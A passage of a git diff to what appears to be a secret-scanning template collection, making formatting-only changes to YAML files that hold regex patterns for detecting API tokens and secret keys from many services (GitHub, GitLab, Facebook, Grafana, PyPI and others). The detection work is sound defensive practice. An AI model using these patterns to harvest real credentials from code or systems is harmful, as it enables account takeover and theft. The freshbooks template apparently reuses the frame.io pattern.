+10,6 @@ info: metadata: verified: true tags: easypost,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - EZTK(?i)[a-z0-9]{54} \ No newline at end of file + - EZTK(?i)[a-z0-9]{54} diff --git a/file/keys/etsy-access-token.yaml b/file/keys/etsy-access-token.yaml index a3ee2d3c1c..bee30e1470 100644 --- a/file/keys/etsy-access-token.yaml +++ b/file/keys/etsy-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: etsy,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/facebook/facebook-api-token.yaml b/file/keys/facebook/facebook-api-token.yaml index a0a5aa0f54..554bceb8b3 100644 --- a/file/keys/facebook/facebook-api-token.yaml +++ b/file/keys/facebook/facebook-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: facebook,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/facebook/facebook-client-id.yaml b/file/keys/facebook/facebook-client-id.yaml index 17fbbdc79c..9239e26227 100644 --- a/file/keys/facebook/facebook-client-id.yaml +++ b/file/keys/facebook/facebook-client-id.yaml @@ -7,10 +7,9 @@ info: description: Facebook client ID token was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 tags: token,file,facebook - file: - extensions: - all diff --git a/file/keys/facebook/facebook-secret.yaml b/file/keys/facebook/facebook-secret.yaml index 1889fa2a85..d64d276e3b 100644 --- a/file/keys/facebook/facebook-secret.yaml +++ b/file/keys/facebook/facebook-secret.yaml @@ -6,7 +6,6 @@ info: severity: low description: Facebook secret key token was detected. tags: token,file,facebook - file: - extensions: - all diff --git a/file/keys/facebook/fb-access-token.yaml b/file/keys/facebook/fb-access-token.yaml index 17d9e62ca7..c8218646f1 100644 --- a/file/keys/facebook/fb-access-token.yaml +++ b/file/keys/facebook/fb-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: facebook,token,file - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' \ No newline at end of file + - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' diff --git a/file/keys/fastly-api-token.yaml b/file/keys/fastly-api-token.yaml index d3376d968c..5b4e3bb5e5 100644 --- a/file/keys/fastly-api-token.yaml +++ b/file/keys/fastly-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: fastly,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/fcm-api-key.yaml b/file/keys/fcm-api-key.yaml index 382f9e8c0f..38735083e2 100644 --- a/file/keys/fcm-api-key.yaml +++ b/file/keys/fcm-api-key.yaml @@ -5,7 +5,6 @@ info: author: Devang-Solanki severity: medium tags: token,file,fcm,firebase,google - file: - extensions: - all @@ -13,4 +12,4 @@ file: extractors: - type: regex regex: - - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+' \ No newline at end of file + - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+' diff --git a/file/keys/figma-access-token.yaml b/file/keys/figma-access-token.yaml index 76e345b661..a9a94ba197 100644 --- a/file/keys/figma-access-token.yaml +++ b/file/keys/figma-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: figma,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b \ No newline at end of file + - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b diff --git a/file/keys/finicity/finicity-api-token.yaml b/file/keys/finicity/finicity-api-token.yaml index 4a18214f75..6d702db885 100644 --- a/file/keys/finicity/finicity-api-token.yaml +++ b/file/keys/finicity/finicity-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: finicity,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/finicity/finicity-client-secret.yaml b/file/keys/finicity/finicity-client-secret.yaml index 8a88cebb18..8c00d83bb2 100644 --- a/file/keys/finicity/finicity-client-secret.yaml +++ b/file/keys/finicity/finicity-client-secret.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: finicity,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/finnhub-access-token.yaml b/file/keys/finnhub-access-token.yaml index 2b830ded34..7e720ae6c6 100644 --- a/file/keys/finnhub-access-token.yaml +++ b/file/keys/finnhub-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: finnhub,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/firebase-database.yaml b/file/keys/firebase-database.yaml index b02e6e2190..ba8888fb9b 100644 --- a/file/keys/firebase-database.yaml +++ b/file/keys/firebase-database.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: info tags: token,file,firebase - file: - extensions: - all diff --git a/file/keys/flickr-access-token.yaml b/file/keys/flickr-access-token.yaml index 65c5988c6b..1401b9a43e 100644 --- a/file/keys/flickr-access-token.yaml +++ b/file/keys/flickr-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: flickr,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/flutter/flutterwave-encryption-key.yaml b/file/keys/flutter/flutterwave-encryption-key.yaml index 10d2054403..a5fec0f2d7 100644 --- a/file/keys/flutter/flutterwave-encryption-key.yaml +++ b/file/keys/flutter/flutterwave-encryption-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: flutter,file,keys,flutterwave - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - FLWSECK_TEST-(?i)[a-h0-9]{12} \ No newline at end of file + - FLWSECK_TEST-(?i)[a-h0-9]{12} diff --git a/file/keys/flutter/flutterwave-public-key.yaml b/file/keys/flutter/flutterwave-public-key.yaml index 32c4fcea3f..dafc5a5eb6 100644 --- a/file/keys/flutter/flutterwave-public-key.yaml +++ b/file/keys/flutter/flutterwave-public-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: flutter,file,keys,flutterwave - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X \ No newline at end of file + - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X diff --git a/file/keys/flutter/flutterwave-secret-key.yaml b/file/keys/flutter/flutterwave-secret-key.yaml index cb8f91ca1a..c719c8b04f 100644 --- a/file/keys/flutter/flutterwave-secret-key.yaml +++ b/file/keys/flutter/flutterwave-secret-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: flutter,file,keys,flutterwave - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - FLWSECK_TEST-(?i)[a-h0-9]{32}-X \ No newline at end of file + - FLWSECK_TEST-(?i)[a-h0-9]{32}-X diff --git a/file/keys/frameio-api-token.yaml b/file/keys/frameio-api-token.yaml index 352f232f82..88d5f35695 100644 --- a/file/keys/frameio-api-token.yaml +++ b/file/keys/frameio-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: frameio,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - fio-u-(?i)[a-z0-9\-_=]{64} \ No newline at end of file + - fio-u-(?i)[a-z0-9\-_=]{64} diff --git a/file/keys/freshbooks-access-token.yaml b/file/keys/freshbooks-access-token.yaml index 14653518fe..ed199ed997 100644 --- a/file/keys/freshbooks-access-token.yaml +++ b/file/keys/freshbooks-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: freshbooks,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - fio-u-(?i)[a-z0-9\-_=]{64} \ No newline at end of file + - fio-u-(?i)[a-z0-9\-_=]{64} diff --git a/file/keys/gcp-service-account.yaml b/file/keys/gcp-service-account.yaml index 9dd972a00f..96849f2262 100644 --- a/file/keys/gcp-service-account.yaml +++ b/file/keys/gcp-service-account.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: low tags: token,file,google - file: - extensions: - all diff --git a/file/keys/github/github-app-token.yaml b/file/keys/github/github-app-token.yaml index f8b16c189c..ff6b3fe660 100644 --- a/file/keys/github/github-app-token.yaml +++ b/file/keys/github/github-app-token.yaml @@ -5,7 +5,6 @@ info: author: tanq16,DhiyaneshDK severity: medium tags: token,file,github - file: - extensions: - all diff --git a/file/keys/github/github-oauth-token.yaml b/file/keys/github/github-oauth-token.yaml index c1c5eae2d5..5cf5082350 100644 --- a/file/keys/github/github-oauth-token.yaml +++ b/file/keys/github/github-oauth-token.yaml @@ -5,7 +5,6 @@ info: author: tanq16 severity: high tags: token,file,github - file: - extensions: - all diff --git a/file/keys/github/github-outdated-key.yaml b/file/keys/github/github-outdated-key.yaml index 596281159b..a6bc38afd0 100644 --- a/file/keys/github/github-outdated-key.yaml +++ b/file/keys/github/github-outdated-key.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: file,github,ssh,rsa - file: - extensions: - all diff --git a/file/keys/github/github-personal-token.yaml b/file/keys/github/github-personal-token.yaml index 7982d00ae7..91b2ed1998 100644 --- a/file/keys/github/github-personal-token.yaml +++ b/file/keys/github/github-personal-token.yaml @@ -5,7 +5,6 @@ info: author: geeknik severity: high tags: token,file,github - file: - extensions: - all diff --git a/file/keys/github/github-refresh-token.yaml b/file/keys/github/github-refresh-token.yaml index 15b1684157..bf99dafc93 100644 --- a/file/keys/github/github-refresh-token.yaml +++ b/file/keys/github/github-refresh-token.yaml @@ -5,7 +5,6 @@ info: author: tanq16 severity: high tags: token,file,github - file: - extensions: - all diff --git a/file/keys/gitlab/gitlab-personal-accesstoken.yaml b/file/keys/gitlab/gitlab-personal-accesstoken.yaml index 00774772f5..5985edc5f4 100644 --- a/file/keys/gitlab/gitlab-personal-accesstoken.yaml +++ b/file/keys/gitlab/gitlab-personal-accesstoken.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: gitlab,token,file - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' \ No newline at end of file + - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' diff --git a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml index 19131d15fb..2a17667bfc 100644 --- a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml +++ b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: gitlab,token,file - file: - extensions: - all @@ -21,4 +20,4 @@ file: - type: regex part: body regex: - - '\b(glptt-[0-9a-f]{40})\b' \ No newline at end of file + - '\b(glptt-[0-9a-f]{40})\b' diff --git a/file/keys/gitlab/gitlab-runner-regtoken.yaml b/file/keys/gitlab/gitlab-runner-regtoken.yaml index c811c2c530..dcf34019a7 100644 --- a/file/keys/gitlab/gitlab-runner-regtoken.yaml +++ b/file/keys/gitlab/gitlab-runner-regtoken.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: gitlab,runner,token,file - file: - extensions: - all @@ -21,4 +20,4 @@ file: - type: regex part: body regex: - - '\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)' \ No newline at end of file + - '\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)' diff --git a/file/keys/gitter-access-token.yaml b/file/keys/gitter-access-token.yaml index dd4c03ce53..176985c93f 100644 --- a/file/keys/gitter-access-token.yaml +++ b/file/keys/gitter-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: gitter,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/gocardless-api-token.yaml b/file/keys/gocardless-api-token.yaml index ab55b0aacb..073f5e80b4 100644 --- a/file/keys/gocardless-api-token.yaml +++ b/file/keys/gocardless-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: gocardless,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/google/google-api.yaml b/file/keys/google/google-api.yaml index 1242ce0367..e5f09725c8 100644 --- a/file/keys/google/google-api.yaml +++ b/file/keys/google/google-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: info tags: token,file,google - file: - extensions: - all diff --git a/file/keys/google/google-clientid.yaml b/file/keys/google/google-clientid.yaml index 695e9af067..ecfbede5c2 100644 --- a/file/keys/google/google-clientid.yaml +++ b/file/keys/google/google-clientid.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: google,token,file - file: - extensions: - all @@ -18,4 +17,4 @@ file: - type: regex part: body regex: - - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' \ No newline at end of file + - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' diff --git a/file/keys/google/google-oauth-clientsecret.yaml b/file/keys/google/google-oauth-clientsecret.yaml index 97060e0cc4..0f52d91a55 100644 --- a/file/keys/google/google-oauth-clientsecret.yaml +++ b/file/keys/google/google-oauth-clientsecret.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: google,token,file - file: - extensions: - all @@ -18,4 +17,4 @@ file: - type: regex part: body regex: - - '(GOCSPX-[a-zA-Z0-9_-]{28})' \ No newline at end of file + - '(GOCSPX-[a-zA-Z0-9_-]{28})' diff --git a/file/keys/grafana/grafana-api-key.yaml b/file/keys/grafana/grafana-api-key.yaml index af821a6060..44ac10e11a 100644 --- a/file/keys/grafana/grafana-api-key.yaml +++ b/file/keys/grafana/grafana-api-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: grafana,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/grafana/grafana-cloud-api-token.yaml b/file/keys/grafana/grafana-cloud-api-token.yaml index 20ec44482c..9f57fc4767 100644 --- a/file/keys/grafana/grafana-cloud-api-token.yaml +++ b/file/keys/grafana/grafana-cloud-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: grafana,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/grafana/grafana-service-account-token.yaml b/file/keys/grafana/grafana-service-account-token.yaml index fc5748771e..f6d45c1c3f 100644 --- a/file/keys/grafana/grafana-service-account-token.yaml +++ b/file/keys/grafana/grafana-service-account-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: grafana,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/hashicorp-api-token.yaml b/file/keys/hashicorp-api-token.yaml index ca0b289484..8f716d9973 100644 --- a/file/keys/hashicorp-api-token.yaml +++ b/file/keys/hashicorp-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: hashicorp,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} \ No newline at end of file + - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} diff --git a/file/keys/heroku-key.yaml b/file/keys/heroku-key.yaml index 40116fa08f..ab29ee5ee8 100644 --- a/file/keys/heroku-key.yaml +++ b/file/keys/heroku-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: heroku,token,file - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' \ No newline at end of file + - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' diff --git a/file/keys/jenkins-token.yaml b/file/keys/jenkins-token.yaml index 53ce0dcc29..72a9b49d0a 100644 --- a/file/keys/jenkins-token.yaml +++ b/file/keys/jenkins-token.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: jenkins,crumb,token,file - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' \ No newline at end of file + - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' diff --git a/file/keys/linkedin-id.yaml b/file/keys/linkedin-id.yaml index 209dcb4d6e..12961717d1 100644 --- a/file/keys/linkedin-id.yaml +++ b/file/keys/linkedin-id.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: low tags: token,file,linkedin - file: - extensions: - all diff --git a/file/keys/mailchimp-api.yaml b/file/keys/mailchimp-api.yaml index 7e5a4bad37..e91a374eb2 100644 --- a/file/keys/mailchimp-api.yaml +++ b/file/keys/mailchimp-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,mailchimp - file: - extensions: - all diff --git a/file/keys/mailgun-api.yaml b/file/keys/mailgun-api.yaml index ec96ecfed8..a05fa01b15 100644 --- a/file/keys/mailgun-api.yaml +++ b/file/keys/mailgun-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,mailgun - file: - extensions: - all diff --git a/file/keys/mapbox-token.yaml b/file/keys/mapbox-token.yaml index 633d69f111..ebcd3f172c 100644 --- a/file/keys/mapbox-token.yaml +++ b/file/keys/mapbox-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: token,file,mapbox - file: - extensions: - all diff --git a/file/keys/newrelic/newrelic-pixie-apikey.yaml b/file/keys/newrelic/newrelic-pixie-apikey.yaml index 34de703a9b..ca8f07609f 100644 --- a/file/keys/newrelic/newrelic-pixie-apikey.yaml +++ b/file/keys/newrelic/newrelic-pixie-apikey.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: newrelic,pixie,token,file - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" \ No newline at end of file + - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" diff --git a/file/keys/newrelic/newrelic-pixie-deploykey.yaml b/file/keys/newrelic/newrelic-pixie-deploykey.yaml index 07739f6da5..ab75fa4d54 100644 --- a/file/keys/newrelic/newrelic-pixie-deploykey.yaml +++ b/file/keys/newrelic/newrelic-pixie-deploykey.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: newrelic,pixie,token,file - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" \ No newline at end of file + - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" diff --git a/file/keys/npm-accesstoken.yaml b/file/keys/npm-accesstoken.yaml index b02dd3f357..8e582ffd29 100644 --- a/file/keys/npm-accesstoken.yaml +++ b/file/keys/npm-accesstoken.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: npm,token,file - file: - extensions: - all diff --git a/file/keys/nuget-key.yaml b/file/keys/nuget-key.yaml index 967058a894..e976649fdb 100644 --- a/file/keys/nuget-key.yaml +++ b/file/keys/nuget-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: nuget,token,file - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - "(oy2[a-z0-9]{43})" \ No newline at end of file + - "(oy2[a-z0-9]{43})" diff --git a/file/keys/openai-key.yaml b/file/keys/openai-key.yaml index 580770bb98..41fc5ee95a 100644 --- a/file/keys/openai-key.yaml +++ b/file/keys/openai-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: openai,token,file - file: - extensions: - all diff --git a/file/keys/paypal-braintree-token.yaml b/file/keys/paypal-braintree-token.yaml index 59dc3e8dbd..253296be45 100644 --- a/file/keys/paypal-braintree-token.yaml +++ b/file/keys/paypal-braintree-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,paypal - file: - extensions: - all diff --git a/file/keys/pictatic-api-key.yaml b/file/keys/pictatic-api-key.yaml index ec20f07569..9c08d4d2e3 100644 --- a/file/keys/pictatic-api-key.yaml +++ b/file/keys/pictatic-api-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,4 @@ file: extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" \ No newline at end of file + - "sk_live_[0-9a-z]{32}" diff --git a/file/keys/postman-api-key.yaml b/file/keys/postman-api-key.yaml index 16949c29ad..ab86fd89fd 100644 --- a/file/keys/postman-api-key.yaml +++ b/file/keys/postman-api-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: postman,keys,file,token - file: - extensions: - all diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml index d1f6cd83f5..512d112fbb 100644 --- a/file/keys/private-key.yaml +++ b/file/keys/private-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang,geeknik severity: high tags: token,file - file: - extensions: - all diff --git a/file/keys/pypi-token.yaml b/file/keys/pypi-token.yaml index c52a0343ae..2ac7db2661 100644 --- a/file/keys/pypi-token.yaml +++ b/file/keys/pypi-token.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: pypi,token,file - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})" \ No newline at end of file + - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})" diff --git a/file/keys/razorpay-client-id.yaml b/file/keys/razorpay-client-id.yaml index 02e2a473b3..b687125057 100644 --- a/file/keys/razorpay-client-id.yaml +++ b/file/keys/razorpay-client-id.yaml @@ -8,7 +8,6 @@ info: - https://github.com/streaak/keyhacks#Razorpay-keys - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey tags: token,file,razorpay - file: - extensions: - all diff --git a/file/keys/rubygems-key.yaml b/file/keys/rubygems-key.yaml index 2f32147063..d163c88ec7 100644 --- a/file/keys/rubygems-key.yaml +++ b/file/keys/rubygems-key.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: rubygems,token,file,ruby - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - "(rubygems_[a-f0-9]{48})" \ No newline at end of file + - "(rubygems_[a-f0-9]{48})" diff --git a/file/keys/s3-bucket.yaml b/file/keys/s3-bucket.yaml index e51f559e8c..976fd29980 100644 --- a/file/keys/s3-bucket.yaml +++ b/file/keys/s3-bucket.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: info tags: token,file,bucket - file: - extensions: - all diff --git a/file/keys/sauce-access-token.yaml b/file/keys/sauce-access-token.yaml index 5d528c72cd..c4508e1073 100644 --- a/file/keys/sauce-access-token.yaml +++ 